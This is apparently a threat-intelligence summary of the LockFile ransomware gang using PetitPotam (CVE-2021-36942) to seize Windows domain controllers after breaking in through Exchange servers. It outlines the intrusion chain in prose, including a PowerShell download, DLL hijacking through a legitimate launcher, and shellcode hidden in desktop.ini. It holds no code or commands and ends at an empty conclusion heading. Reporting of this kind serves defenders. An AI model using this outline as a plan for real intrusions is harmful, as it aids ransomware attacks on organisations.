LockFile Uses PetitPotam Attack to Target Domain Controllers

What has happened

• According to researchers, the attackers had gained initial access to the network via abusing Exchange servers. However, researchers were not able to confirm the exact method.
• The attackers then gained control over the organization’s domain controller by abusing the PetitPotam method. This method forces authentication to a remote NTLM relay under the control of LockFile.
• The LockFile ransomware gang is using the publicly available code to take advantage of the original PetitPotam variant, which is tracked as CVE-2021-36942.
• After the attackers successfully gain full control over the targeted domain controller, they take control over the whole Windows domain.
• Moreover, researchers found that the ransom note by LockFile looks similar to that of the LockBit ransomware group. Besides, a reference was made to the Conti group in LockFile’s contact email address

The attack chain

• While compromising the Exchange server, the attacker runs a PowerShell command to download a file from a remote location. 
• There is a buffer time of 20–30 minutes before ransomware gets dropped.
• The group gains control over the domain by installing the PetitPotam exploits with two files: active_desktop_render[.]dll and active_desktop_launcher[.]exe.
• One of the files is a genuine KuGou Active Desktop launcher, which is compromised to carry out a DLL hijacking attack to load a malicious DLL. This is used to avoid detection by security solutions.
• The DLL attempts to load/decrypt desktop[.]ini that includes shellcode and finally, ransomware payload is copied on the local domain controller. The payload is then spread across the network using a script and an executable file.

Conclusion